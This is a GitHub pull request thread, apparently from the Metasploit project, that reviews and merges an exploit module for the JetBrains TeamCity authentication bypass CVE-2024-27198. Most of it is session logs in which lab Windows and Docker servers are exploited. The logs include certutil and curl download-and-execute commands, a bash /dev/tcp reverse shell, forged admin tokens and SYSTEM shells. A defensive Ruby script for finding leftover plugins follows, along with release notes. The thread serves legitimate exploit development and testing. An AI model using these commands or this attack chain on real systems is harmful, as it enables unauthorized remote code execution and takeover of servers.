                                                                                         at-juli.jar -Dcatalina.base=/opt/TeamCity -Dcatalina.home=/opt/TeamCity -Djava.io.tmpdir=/opt/TeamCity/temp org.apache.catalina.st
                                                                                         artup.Bootstrap start

@cdelafuente-r7
Contributor

Thanks @sfewer-r7 for all these details. It is likely to be the issue reported in this issue, and this info will help a lot.


@cdelafuente-r7 cdelafuente-r7 left a comment


Thank you @sfewer-r7 for this module! I left a few minor comments for now and I will start to test it.

There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit method. I believe a few things can be done:

  1. avoid nested if/else and begin/rescue/ensure blocks as much as possible
  2. break down the code in multiple methods with descriptive names
  3. use custom exceptions in methods, which can be handled in the main exploit method.

sfewer-r7 and others added 7 commits March 13, 2024 09:11
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…login

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
… create_payload_plugin and auth_new_admin_user. several if/unless blocks were flattened to be inline if/unless
@sfewer-r7

sfewer-r7 commented Mar 13, 2024

Thanks @cdelafuente-r7 for the great feedback. I think I have addressed all of your suggestions/questions.

There is one more thing I think would improve readability. I'm wondering if it's possible to reduce the size of the exploit method. I believe a few things can be done:

I added commit 6d84f0e which reduces the exploit method quite a lot by spinning out two new methods create_payload_plugin and auth_new_admin_user, and flattening a few if/unless blocks.

@cdelafuente-r7

Thank you for updating this @sfewer-r7! Everything looks good to me now. I tested against version 2023.11.3 in a Docker installation and on Windows Server 2019, and verified I got a session with each target. I'll go ahead and land it.

  • Example output:
Target 0 (Java) - Windows Server 2019
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 0
target => 0
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.d0pXaG9LaXFJdlM5cC1pcjcwZExGNnF4VDJ3.ZWYyZGYwOWYtMDlmZC00ODRlLWE5NTktYmEzYTgzMzUxM2Vi
[*] Uploading plugin: xaR72E5m
[*] Sending stage (57971 bytes) to 192.168.101.114
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[+] Deleted C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_xaR72E5m
[*] Meterpreter session 15 opened (192.168.101.1:4444 -> 192.168.101.114:57624) at 2024-03-13 18:32:01 +0100
[*] Enabled Plugin UUID: 79b909ce-fd10-435e-aa66-89fdefd4c3ab
[*] Disabled Plugin UUID: 6799eb1e-3e07-499e-a380-ef266cb52d17
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\xaR72E5m' on the target
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\xaR72E5m' on the target

meterpreter > getuid
Server username: DC02$
meterpreter > sysinfo
Computer        : dc02
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows

Target 1 (Java Server Page) - Windows Server 2019
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.QTlzemMwenc2MF9JSDEzRlByeVlMNGpvWmEw.OWJmNzQ4ZjEtNTUyNy00ZTBmLTgwYzMtZDJjOWQ0ODlmOTIx
[*] Uploading plugin: nlWa0Qlx
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[*] Enabled Plugin UUID: 3fed8a0e-8e21-4b3f-9e39-379ab8f123dd
[*] Disabled Plugin UUID: b1f14027-a7a5-4829-9275-d1add9af7fea
[*] Deleting the authentication token...
[*] Command shell session 19 opened (192.168.101.1:4444 -> 192.168.101.114:57662) at 2024-03-13 18:36:47 +0100
[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\nlWa0Qlx' on the target
[!] This exploit may require manual cleanup of 'C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_nlWa0Qlx' on the target
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\nlWa0Qlx' on the target


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\TeamCity\bin>
-----


c:\TeamCity\bin>whoami
whoami
nt authority\system

c:\TeamCity\bin>ver
ver

Microsoft Windows [Version 10.0.17763.107]

Target 2 (Windows Command) - Windows Server 2019
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 2
target => 2
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\vdBJysqwdyV.exe & start /B %TEMP%\vdBJysqwdyV.exe
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.NnlqQm16WTJ1cXNhUmUwUXNWTE5QcTZCN1I4.OTZkYTZjZDItMTgxYy00NDdmLThkZGEtZTUwZGYzZWJjYzc4
[*] Uploading plugin: zieNyE3T
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[*] Client 192.168.101.114 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.114 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.101.114 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.114 (CertUtil URL Agent)
[*] Enabled Plugin UUID: bb251783-a281-41ba-aa3b-b02d36cec551
[*] Sending stage (201798 bytes) to 192.168.101.114
[*] Disabled Plugin UUID: e84286be-4ba9-42f7-be80-494f7583cd53
[*] Deleting the authentication token...
[+] Deleted C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_zieNyE3T
[*] Meterpreter session 20 opened (192.168.101.1:4444 -> 192.168.101.114:57673) at 2024-03-13 18:38:30 +0100
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\zieNyE3T' on the target

meterpreter > sysinfo
Computer        : DC02
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Target 0 (Java) - Linux (Docker) - Windows Server 2019
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.cm5TTl9uRE1RSUExWVZ6ODBRZTVaWHZMTnJJ.YzFlY2Y4NzctYmFiYy00ZTkyLTk2YWYtOTg2YWVhNDYxN2Nl
[*] Uploading plugin: TyctKoBN
[*] Sending stage (57971 bytes) to 192.168.101.1
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: af42b0fb-79e2-4f94-8bcf-136aec500dff
[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.1:55097) at 2024-03-13 13:04:29 +0100
[*] Disabled Plugin UUID: 37d9471d-75ca-4afe-90bc-edcfb0877ce6
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/teamcity/webapps/ROOT/plugins/TyctKoBN' on the target
[!] This exploit may require manual cleanup of '/opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_TyctKoBN' on the target
[!] This exploit may require manual cleanup of '/data/teamcity_server/datadir/system/caches/plugins.unpacked/TyctKoBN' on the target

meterpreter > getuid
Server username: tcuser
meterpreter > sysinfo
Computer        : 03456a935523
OS              : Linux 6.6.12-linuxkit (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux

Target 1 (Java Server Page) - Linux (Docker)
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 1
target => 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.d1JMdnR4bUtpVGlkajluOFZmN0FnejZ1aXVN.OGRmNTk0ZmEtNjliOC00N2ZlLTk3NzgtZDNkZDAwM2ZlOTQy
[*] Uploading plugin: ff20gsKg
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: e0d83eaf-64d4-4c39-a6bc-4d4461d5de8e
[*] Disabled Plugin UUID: 2e1bddd1-6570-4048-981f-565cdcc1e652
[*] Deleting the authentication token...
[+] Deleted /opt/teamcity/webapps/ROOT/plugins/ff20gsKg
[+] Deleted /opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_ff20gsKg
[+] Deleted /data/teamcity_server/datadir/system/caches/plugins.unpacked/ff20gsKg
[*] Command shell session 3 opened (192.168.101.1:4444 -> 192.168.101.1:55129) at 2024-03-13 13:07:59 +0100

id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
uname -a
Linux 03456a935523 6.6.12-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 30 09:48:40 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

Target 3 (Linux Command) - Linux (Docker)
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 3
target => 3
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Command to run on remote host: curl -so ./kwugWLvQ http://192.168.101.1:8080/yPrBoTF-dOT5qHcUdFGrMQ; chmod +x ./kwugWLvQ; ./kwugWLvQ &
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /yPrBoTF-dOT5qHcUdFGrMQ
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.MlUzUWtlZXJ2ZnN3ZkxITFk0OFM4bGd3Ukd3.MDQ2MDljMGYtYzM3ZC00NzhiLWJiODktOTdmNTUyZmY1ZTBh
[*] Uploading plugin: DQ4F4xGJ
[*] Client 192.168.101.1 requested /yPrBoTF-dOT5qHcUdFGrMQ
[*] Sending payload to 192.168.101.1 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.101.1
[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.1:52131) at 2024-03-13 17:08:13 +0100
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: 65784f5b-ee45-4ae0-ad94-935dff4333b8
[*] Disabled Plugin UUID: 6b6fa68d-0be8-4ded-a951-b9a27296f9d8
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_DQ4F4xGJ' on the target
[!] This exploit may require manual cleanup of '/data/teamcity_server/datadir/system/caches/plugins.unpacked/DQ4F4xGJ' on the target

meterpreter > getuid
Server username: tcuser
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.12-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Target 4 (Unix Command) - Linux (Docker)
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 4
target => 4
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[+] bash -c '0<&44-;exec 44<>/dev/tcp/192.168.101.1/4444;sh <&44 >&44 2>&44'
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UGJGRi1SWnFvQl90bmxGTjJUYmxPVWx0MGQ4.NzczMDExN2EtODZjYi00NTNmLWE2ZTAtMTgyM2YxM2NjZDRm
[*] Uploading plugin: FTC4vpXA
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: db263177-c19d-4f8a-8fcd-45b5e721adce
[*] Disabled Plugin UUID: 09d76d8e-5e82-4bb9-97c6-982b886cf524
[*] Deleting the authentication token...
[+] Deleted /opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_FTC4vpXA
[+] Deleted /data/teamcity_server/datadir/system/caches/plugins.unpacked/FTC4vpXA
[*] Command shell session 3 opened (192.168.101.1:4444 -> 192.168.101.1:52162) at 2024-03-13 17:09:42 +0100

id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
uname -a
Linux 3a560cc3accb 6.6.12-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 30 09:48:40 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
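The session output above shows the module's cleanup is best effort: each run warns that directories under `webapps/ROOT/plugins`, `work/Catalina/localhost/ROOT/TC_<build>_<name>` and `system/caches/plugins.unpacked` may survive on the server, and the plugin name is an 8-character alphanumeric string (xaR72E5m, nlWa0Qlx, TyctKoBN and so on). The Ruby script below is an added example for incident responders, not code from this PR or from the Metasploit module: it walks those three locations and reports every entry whose name (or `TC_<build>_<name>` form) matches that naming and is not on an operator-supplied allow-list. The directory layout is assumed from the Windows and Docker paths printed above, and the scan runs against a tree constructed in a temporary directory. The name pattern is only a triage heuristic: a legitimate plugin that happens to have an 8-character alphanumeric name will be reported too, which is what the allow-list is for.

```ruby
require 'fileutils'
require 'tmpdir'

# Naming observed in the session output above: the uploaded plugin gets an
# 8-character alphanumeric name, and Tomcat explodes it into TC_<build>_<name>.
PLUGIN_NAME  = /\A[A-Za-z0-9]{8}\z/
EXPLODED_DIR = /\ATC_\d+_([A-Za-z0-9]{8})\z/

# The three locations the module reports it may leave behind, relative to the
# TeamCity install path and the data directory (layout assumed from the output).
def artifact_dirs(install_path, data_dir)
  [
    File.join(install_path, 'webapps', 'ROOT', 'plugins'),
    File.join(install_path, 'work', 'Catalina', 'localhost', 'ROOT'),
    File.join(data_dir, 'system', 'caches', 'plugins.unpacked')
  ]
end

# Returns { plugin_name => [paths] } for every directory entry that matches the
# random naming above and is not on the allow-list of known plugins.
def leftover_plugins(install_path:, data_dir:, allowed: [])
  found = Hash.new { |h, k| h[k] = [] }
  artifact_dirs(install_path, data_dir).each do |dir|
    next unless File.directory?(dir) # layouts differ between installs; skip what is absent
    Dir.children(dir).sort.each do |entry|
      # Reduce TC_147512_xaR72E5m to xaR72E5m so all three locations key on the same name.
      name = (m = entry.match(EXPLODED_DIR)) ? m[1] : entry
      next unless name.match?(PLUGIN_NAME)
      next if allowed.include?(name)
      found[name] << File.join(dir, entry)
    end
  end
  found
end

# Constructed TeamCity-like tree: one legitimate plugin plus the remains of an
# incomplete cleanup (the plugin name is the one from the output above).
def demo
  Dir.mktmpdir('tc') do |root|
    install = File.join(root, 'TeamCity')
    datadir = File.join(root, 'datadir')
    FileUtils.mkdir_p(File.join(install, 'webapps', 'ROOT', 'plugins', 'commit-status-publisher'))
    FileUtils.mkdir_p(File.join(install, 'work', 'Catalina', 'localhost', 'ROOT', 'TC_147512_commit-status-publisher'))
    FileUtils.mkdir_p(File.join(install, 'work', 'Catalina', 'localhost', 'ROOT', 'TC_147512_xaR72E5m'))
    FileUtils.mkdir_p(File.join(datadir, 'system', 'caches', 'plugins.unpacked', 'xaR72E5m'))
    leftover_plugins(install_path: install, data_dir: datadir)
  end
end

if __FILE__ == $PROGRAM_NAME
  demo.each do |name, paths|
    puts "#{name}:"
    paths.each { |p| puts "  #{p}" }
  end
end
```

On a real server, call `leftover_plugins` with the install path and data directory the module printed (`C:\TeamCity` and `C:\ProgramData\JetBrains\TeamCity`, or `/opt/teamcity` and `/data/teamcity_server/datadir` in the Docker case) and pass the names of plugins you installed deliberately in `allowed:`. A name that appears in more than one of the three locations is a stronger indicator than a single hit, since the module touches all three during a run.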

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 13, 2024
@cdelafuente-r7 cdelafuente-r7 merged commit 44c5422 into rapid7:master Mar 13, 2024
35 checks passed
@cdelafuente-r7

Release Notes

This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and the creation of a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.
